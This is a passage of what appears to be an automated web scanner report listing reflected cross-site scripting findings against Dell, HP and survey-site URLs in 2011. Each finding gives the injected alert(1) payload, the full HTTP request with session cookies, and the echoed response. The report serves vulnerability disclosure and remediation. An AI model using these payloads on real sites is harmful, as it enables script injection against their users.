tion%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/JavaScript
Content-Length: 8951
Date: Sun, 04 Sep 2011 16:20:42 GMT
Server: Test & Target

var mboxCurrent = mboxFactories.get('default').get('enus_ng',0);mboxCurrent.setOffer(new mboxOfferAjax('<!-- Offer Id: 68329 --><!--\nID 155 - US BSD - browse ANAV layout\nID 406 - US BSD Browse Fran
...[SNIP]...
vs_pd_pages_recipe_c_406.html
// Dev: Anish John & Wolff

(function tnt(){
if(typeof $j === 'function'){

var turl = window.location.href;
       
       var pt = '';
       var catid = '2eb52';alert(1)//dfc1fb26081';
       
       if (pt=='franchise'){
           if(catid.indexOf("laptop")>
...[SNIP]...

3.17. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [profile.pn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/ajax

Issue detail

The value of the profile.pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7cbb'%3balert(1)//6aaa9f386df was submitted in the profile.pn parameter. This input was echoed as e7cbb';alert(1)//6aaa9f386df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/dellinc/mbox/ajax?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153155747-78365&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=1&mbox=enus_ng&mboxId=0&mboxTime=1315135150946&profile.r=us&profile.c=us&profile.l=en&profile.s=bsd&profile.cs=04&profile.pn=e7cbb'%3balert(1)//6aaa9f386df&profile.pt=&profile.catid=&profile.catpath=&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/JavaScript
Content-Length: 8951
Date: Sun, 04 Sep 2011 16:20:37 GMT
Server: Test & Target

var mboxCurrent = mboxFactories.get('default').get('enus_ng',0);mboxCurrent.setOffer(new mboxOfferAjax('<!-- Offer Id: 68329 --><!--\nID 155 - US BSD - browse ANAV layout\nID 406 - US BSD Browse Fran
...[SNIP]...


// Campaign: Temporary Implementation on moving ANAV up
// Offer: US BSD Browse ANAV Layout - Recipe A&B
// Dev: Anish John

(function(){

   var tnt_me = arguments.callee;
   var sc_pagename = 'e7cbb';alert(1)//6aaa9f386df';
   //console.log(sc_pagename);
   if (sc_pagename!= 'us:en:bsd:04:homepage:'){
       if(typeof $j === 'function'){
           $j(function(){
//commented out on 5/10/11 by CS to fix Enterprise n
...[SNIP]...

3.18. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [profile.pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/ajax

Issue detail

The value of the profile.pt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73ac0'%3balert(1)//12e44e77684 was submitted in the profile.pt parameter. This input was echoed as 73ac0';alert(1)//12e44e77684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/dellinc/mbox/ajax?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153155747-78365&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=1&mbox=enus_ng&mboxId=0&mboxTime=1315135150946&profile.r=us&profile.c=us&profile.l=en&profile.s=bsd&profile.cs=04&profile.pn=&profile.pt=73ac0'%3balert(1)//12e44e77684&profile.catid=&profile.catpath=&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/JavaScript
Content-Length: 8979
Date: Sun, 04 Sep 2011 16:20:39 GMT
Server: Test & Target

var mboxCurrent = mboxFactories.get('default').get('enus_ng',0);mboxCurrent.setOffer(new mboxOfferAjax('<!-- Offer Id: 68329 --><!--\nID 155 - US BSD - browse ANAV layout\nID 406 - US BSD Browse Fran
...[SNIP]...
nchise_links_to_3x_vs_pd_pages_recipe_c_406.html
// Dev: Anish John & Wolff

(function tnt(){
if(typeof $j === 'function'){

var turl = window.location.href;
       
       var pt = '73ac0';alert(1)//12e44e77684';
       var catid = '';
       
       if (pt=='franchise'){
           if(catid.indexOf("laptop")>
...[SNIP]...

3.19. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 1d9ac<script>alert(1)</script>ffab928f11c was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/dellinc/mbox/standard?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153150925-582363&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=2&mbox=enus_create1d9ac<script>alert(1)</script>ffab928f11c&mboxId=0&mboxTime=1315135150965&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315153150925-582363.19; Domain=dellinc.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 16:20:13 GMT; Path=/m2/dellinc
Content-Type: text/javascript
Content-Length: 207
Date: Sun, 04 Sep 2011 16:20:13 GMT
Server: Test & Target

mboxFactories.get('default').get('enus_create1d9ac<script>alert(1)</script>ffab928f11c',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315153150925-582363.19");

3.20. http://ecustomeropinions.com/survey/survey.php [data1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecustomeropinions.com
Path:   /survey/survey.php

Issue detail

The value of the data1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11b8d"style%3d"x%3aexpression(alert(1))"5507b297506 was submitted in the data1 parameter. This input was echoed as 11b8d"style="x:expression(alert(1))"5507b297506 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /survey/survey.php?sid=603736412&data1=5.5.0.11511b8d"style%3d"x%3aexpression(alert(1))"5507b297506&data2=xss.cx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: ecustomeropinions.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: server=www18; path=/
Pragma: no-cache
P3P: CP="NOI DSP COR ADM DEV PSA PSD OUR IND COM NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="data1" value="5.5.0.11511b8d"style="x:expression(alert(1))"5507b297506" />
...[SNIP]...

3.21. http://h20180.www2.hp.com/apps/Nav [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h20180.www2.hp.com
Path:   /apps/Nav

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc170"%3balert(1)//5094ea54093 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc170";alert(1)//5094ea54093 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/Nav?h_pagetype=s-005&h_cc=us&h_lang=en&h_page=hpcom&h_product=top&h_client=test&fc170"%3balert(1)//5094ea54093=1 HTTP/1.1
Host: h20180.www2.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:11 GMT
Server: Apache
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 18:32:11 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 23112

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
...[SNIP]...
m below accordingly
cclang = "en"; // for Customer Care Search REMOVE and USe h_lang and h_cc
lang = "en"; // for global hp Search
cc = "us";
extravars="fc170";alert(1)//5094ea54093=1&lang=en&cc=us";//for extra parameters that are passed in url
if (document.myForm.search[0].checked)
top.location="http://www.hp.com/cgi-bin/cposupport/ccsearch/displayans?qry="+n
...[SNIP]...

3.22. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffcdd"><script>alert(1)</script>3d65e0e84c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /campusffcdd"><script>alert(1)</script>3d65e0e84c7/p/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:07 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:14 GMT
X-Cluster-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Connection: Close
Content-Length: 31053


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/campusffcdd"><script>alert(1)</script>3d65e0e84c7/p/campusId/10640/Graphic_arts.htm?printable=true">
...[SNIP]...

3.23. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 760e0"><script>alert(1)</script>07593cf9d0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /campus/p760e0"><script>alert(1)</script>07593cf9d0b/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:14 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:21 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Connection: Close
Content-Length: 30744


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/campus/p760e0"><script>alert(1)</script>07593cf9d0b/campusId/10640/Graphic_arts.htm?printable=true">
...[SNIP]...

3.24. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d0f5"><script>alert(1)</script>6549be04bdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /campus/p/campusId6d0f5"><script>alert(1)</script>6549be04bdf/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:20 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:27 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 38576
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>

HP Learning Cente
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/campus/p/campusId6d0f5"><script>alert(1)</script>6549be04bdf/10640/Graphic_arts.htm?campusId6d0f5%22%3E%3Cscript%3Ealert%281%29%3C=script%3E6549be04bdf&printable=true&10640=Graphic_arts.htm">
...[SNIP]...

3.25. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c48"><script>alert(1)</script>4211f41393e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /campus/p/campusId/1064047c48"><script>alert(1)</script>4211f41393e/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:26 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:33 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 38613
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>

HP Learning Cente
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/campus/p/campusId/1064047c48"><script>alert(1)</script>4211f41393e/Graphic_arts.htm?printable=true&script%3E4211f41393e=Graphic_arts.htm&campusId=1064047c48%22%3E%3Cscript%3Ealert%281%29%3C">
...[SNIP]...

3.26. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5bb3'-alert(1)-'d1d24f8133d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /campus/p/campusId/10640b5bb3'-alert(1)-'d1d24f8133d/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:29 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:36 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 38640
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>

HP Learning Cente
...[SNIP]...
<script type="text/javascript" language="JavaScript">
try {
Powered.WebAnalytics.addLinkClickHandlers();

Powered.WebAnalytics.recordPageView('10640b5bb3'-alert(1)-'d1d24f8133d');

} catch(err) {
}
</script>
...[SNIP]...

3.27. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6113c"><script>alert(1)</script>8529132865 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /campus/p/campusId/10640/Graphic_arts.htm6113c"><script>alert(1)</script>8529132865 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:36 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:43 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 56673
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm6113c"><script>alert(1)</script>8529132865?printable=true&Graphic_arts.htm6113c%22%3E%3Cscript%3Ealert%281%29%3C=script%3E8529132865&campusId=10640">
...[SNIP]...

3.28. http://h30187.www3.hp.com/howto_QL_courses.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /howto_QL_courses.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7261f"><script>alert(1)</script>4ba80ec5e10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /howto_QL_courses.jsp7261f"><script>alert(1)</script>4ba80ec5e10 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:33:38 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:47:45 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Connection: Close
Content-Length: 30876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/howto_QL_courses.jsp7261f"><script>alert(1)</script>4ba80ec5e10?printable=true">
...[SNIP]...

3.29. http://h30187.www3.hp.com/index.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /index.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca059"><script>alert(1)</script>af8ce681eb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.jspca059"><script>alert(1)</script>af8ce681eb5 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:00 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:06 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Connection: Close
Content-Length: 30810


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/index.jspca059"><script>alert(1)</script>af8ce681eb5?printable=true">
...[SNIP]...

3.30. http://h30187.www3.hp.com/is/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif

Issue detail

